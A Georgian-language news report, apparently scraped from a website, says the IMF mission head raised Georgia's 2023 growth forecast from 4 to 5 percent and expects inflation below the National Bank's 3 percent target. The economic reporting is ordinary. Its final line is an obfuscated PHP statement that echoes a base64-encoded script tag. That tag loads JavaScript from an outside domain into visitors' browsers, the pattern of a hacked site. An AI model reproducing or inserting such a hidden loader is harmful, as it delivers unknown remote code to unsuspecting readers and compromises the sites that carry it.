celsiusi
ავერსი საქკაბელი

საერთაშორისო სავალუტო ფონდმა 2023 წლისთვის საქართველოს ეკონომიკური ზრდის პროგნოზი ერთი პროცენტით, 4-დან 5 პროცენტამდე გაზარდა.

ამის შესახებ დღეს საერთაშოროსო სავალუტო ფონდის მისიის ხელმძღვანელმა, ჯეიმს ჯონმა განაცხადა.

მისივე თქმით, მიმდინარე წელს ინფლაციაც საქართველოს ეროვნული ბანკის 3-პროცენტიან სამიზნე მაჩვენებელზე ქვემოთ შენარჩუნდება.

„2023 წელს ეკონომიკის ზრდა თავის პოტენციურ ტემპს, 5 პროცენტზე მცირედით მაღალ მაჩვენებელს მოუახლოვდება, ინფლაცია კი, სებ-ის 3-პროცენტიან სამიზნე მაჩვენებელზე ქვემოთ შენარჩუნდება, რასაც სხვა ფაქტორებთან ერთად, მკაცრი მონეტარული პოლიტიკა და პოზიტიური რეალური საპროცენტო განაკვეთები განაპირობებს. საშუალოვადიან პერიოდში ეკონომიკის ზრდა პოტენციურ მაჩვენებელთან ახლოს იქნება, რასაც ინფრასტრუქტურაში განხორციელებული ინვესტიციები და გლობალური ეკონომიკური და ფინანსური პირობების მოსალოდნელი გაუმჯობესება შეუწყობს ხელს. 2024 წელს ინფლაცია სამიზნე მაჩვენებელთან ახლოს შენარჩუნდება. გლობალური ეკონომიკური და ფინანსური ვითარების შესახებ მაღალი გაურკვევლობის, პოლიტიკური ვითარების გათვალისწინებით, ეკონომიკური პოლიტიკა მიმართული უნდა იყოს მაკროეკონომიკური და ფინანსური სტაბილურობის განმტკიცებასა და სტრუქტურული რეფორმების გაგრძელებაზე“, – განაცხადა საერთაშორისო სავალუტო ფონდს მისიის ხელმძღვანელმა.

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");